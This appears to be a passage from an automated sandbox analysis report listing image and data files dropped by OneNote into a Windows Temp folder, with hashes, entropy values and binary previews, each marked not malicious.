Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Temp\{227F92D9-FEEE-4638-A8E4-EFCDC031D124}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
Category:	dropped
Size (bytes):	11040
Entropy (8bit):	7.929583162638891
Encrypted:	false
SSDEEP:	192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
MD5:	02775A1E41CF53AC771D820003903913
SHA1:	2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
SHA-256:	83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
SHA-512:	5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r\|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m\|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B\|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..

C:\Users\user\AppData\Local\Temp\{28EC448F-E1EA-4DE2-898A-5B4E43B8B5AA}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6446544724334107
Encrypted:	false
SSDEEP:	6:RaPGYyfB3h1RRXUnfsbnDWr1tnFFBl/FK+12N1vRujlw//0lweI/a1dRujd:RaPGYyf9/UfsbSr1tnFFBt9WoWf/QA
MD5:	10B8C6FB431E4CCBB1C5E36105D3CE03
SHA1:	D97F9DCFEFAFF0C2E73B9E3B946F375218765D2C
SHA-256:	D56B85A0A9E6D55FDE4D8895FF00E0537846F93F8AC55AD521BC5E544A376E31
SHA-512:	6A1E36955977073E18D4DD0FFA28C776665E51DE9F853F85B6332F502F395A93B82243EA8576B7A4D0FE1D9535E73578A4431EF39FAF6E31822F02C712437DBD
Malicious:	false
Preview:	./.C..vL....W"v_$..c..-C.....:..................?.....I...............................................................................................................h...........................................}</.s..E.......3.........EC.vJ.F.g.....<............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{2AA5D44C-225C-4704-BF76-C7CDE1003DFD}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	33032
Entropy (8bit):	2.941351060644542
Encrypted:	false
SSDEEP:	384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
MD5:	ACF4A9F470281F475EA45E113E9FB009
SHA1:	B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
SHA-256:	5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
SHA-512:	998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
Malicious:	false
Preview:	....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..\|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?

C:\Users\user\AppData\Local\Temp\{2CA139B0-DC4C-4ABA-86B5-45C1691EBF81}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
Category:	dropped
Size (bytes):	84097
Entropy (8bit):	7.78862495530604
Encrypted:	false
SSDEEP:	1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
MD5:	37EED97290E8ECB46A576C84F0810568
SHA1:	18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
SHA-256:	140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
SHA-512:	E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
Malicious:	false
Preview:	......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .

C:\Users\user\AppData\Local\Temp\{2D9CFD47-432F-4012-B427-4942AC47CE88}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6455782179697068
Encrypted:	false
SSDEEP:	6:RaQI3YyfB3h1RRXUnfRebnryFFFBl/FKDe27Rujlw//0lweI/Q2hRujd:RaQgYyf9/UfR2WFFFBt93Wf/Q7
MD5:	F7A0002811FF6722136526CFEE3E009A
SHA1:	D5462D88AB9BFD7FD054AAADC1E09D58D34CEF9E
SHA-256:	159E75D573590ADF41E174FC53B0EB6695F411B0974F91FD9E4B8AFDA6C6BB2C
SHA-512:	BBB5238796021F60F01882BCB9E6B6B906A048E571CA2864CCE5CC87EE24CB1CB98AA0CB5AE9060BC9A29612B1934B247ECDBA875BAFD216A2036BCD6D74F723
Malicious:	false
Preview:	./.C..vL....W"v_r...u.G.....8..................?.....I...............................................................................................................h............................................zq.T..F.Qn..;Tt...........!...A..kG!&R.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{2E6C7FBC-CB5E-4CFE-822B-84DA1DB93575}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Temp\{2E869D72-37FB-4151-A25D-42CE8540907F}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Temp\{305A3861-5DCF-4192-A0DC-351738319A9C}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
Category:	dropped
Size (bytes):	5465
Entropy (8bit):	7.79401348966645
Encrypted:	false
SSDEEP:	96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
MD5:	8470F9A96B6C6CAD9EE60961E96D19B2
SHA1:	AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
SHA-256:	2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
SHA-512:	CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..\|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w\|.H...K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.\|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.\|f/..+\ID.r/.o........0i...G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?...I....M.0<.u....!..C..U.T.....s.Q......_..7K.......?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w

C:\Users\user\AppData\Local\Temp\{30FF7F31-CF20-4218-AD19-9128CBCA8A8A}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Temp\{328812BD-2195-4A6C-922C-C585FC0DA0D8}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Temp\{3295778F-48B3-452A-B1A6-A9F824F6FD87}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 623, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1569
Entropy (8bit):	7.583832946136897
Encrypted:	false
SSDEEP:	24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
MD5:	07DB3F43DE7C1392C67802E74707DAA6
SHA1:	C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
SHA-256:	51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
SHA-512:	E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
Malicious:	false
Preview:	.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..\|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2\|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.\|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...

C:\Users\user\AppData\Local\Temp\{35EB4E62-2397-4FAB-A2C8-BDD2175B93A1}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Temp\{371D4139-BA06-4B16-BDF6-E08762F28C02}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Temp\{379DDDCE-FF3A-4B8A-AD72-EF4FD2D76FD9}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	84941
Entropy (8bit):	7.966881945560921
Encrypted:	false
SSDEEP:	1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
MD5:	CB84C108A76C2AFFCAC2551A3C1EAD56
SHA1:	8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
SHA-256:	139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
SHA-512:	6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z\|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t

C:\Users\user\AppData\Local\Temp\{3C6D860C-D467-4CC3-9B36-6AE06D296131}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	7.799120546917745
Encrypted:	false
SSDEEP:	24:AXFMpSCdmi2MTbWm/8T368Bf50D+1vDD9BFGBsQ5SOryjJ4w6++mPKc82UGOpIUg:AO4m122bQ36gfaS1rDw2QsOryjJ4xLml
MD5:	C2BF462C1311A92660999498F29394BD
SHA1:	4BD7C156F172C1114F33D80BAB05252C9F8E87C0
SHA-256:	5E0A8F7D863DAD057AC91FB888CFA7BE1D30A6CF65A908CE90081C323A0858B7
SHA-512:	1107117B3C4B843E5EB32CB13C5CA91E28857DDAE18A197F471D9FCA5B767C7441661FC3A21D2B6FF3C6EB91048A93598E1D86EA55A60A427D8E4B82E59A30C9
Malicious:	false
Preview:	.PNG........IHDR...(...(........m....sRGB.........pHYs...t...t..f.x....IDATXG..O.W....`...c.C..`.H(!@.[Q..B.D......Q..}.C...}.CTU.MR.j...[.....".x.B.x.wG.2$xf.J..W..g....}w.H.....b* ...../.V_\|.....TC]-.d......\\Z..l......>..D....G.....}.]}.x...X...WZ....?.-..A..&x...Q$)U..../.w...?..!8IE..:.....6..y.z..Yg.`g.@(...z...VS..$@..q2.,."....RT.}..%..q.lA0....[m.................2...8..a.LJ....n......M.%x......\...$g.Y.p.Q^U....$;.r.....>...>...]..$...r..bz.P.(....}:&'ldc...c\|.bs.>z.:?.M....(.SR..a..o..=2....i#..{......y.)....}.1_ .....T@O..F..d....Piu.TQA....#DY.S&G....j....3z..>zL..:...33...C&.S....h...LQk. ...hRSy&m..?...d.....l.].G...BL.-..N;.....s.0Q....T.(0...p....HU..d.V..z.)..2. ..........d...x.{......2.zdP.....;.?aeu......(..,#.....nj.... ....0.X..dr.T)x...4.V...]p8].p.PH.4f{.n.....x.........Z...O>DF.)^.Y.....p.Zf..1e.a.>."fm{.=hui...Fnn.T......./''...U<.,f'........:Y......ckk..RN.....f.omf..rZi.\..h.....\|.4.,/......=.z%.F....Z...>..A.....?.

C:\Users\user\AppData\Local\Temp\{3D186B78-523A-4D92-9167-9462CDAAE1BB}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
Category:	dropped
Size (bytes):	242903
Entropy (8bit):	7.944495275553473
Encrypted:	false
SSDEEP:	6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
MD5:	C594A4AA7234EF91E6C2714CFE1410F1
SHA1:	C0F720D4CE3196852814D0B7347F0CAA0C6FD526
SHA-256:	10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
SHA-512:	7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
Malicious:	false
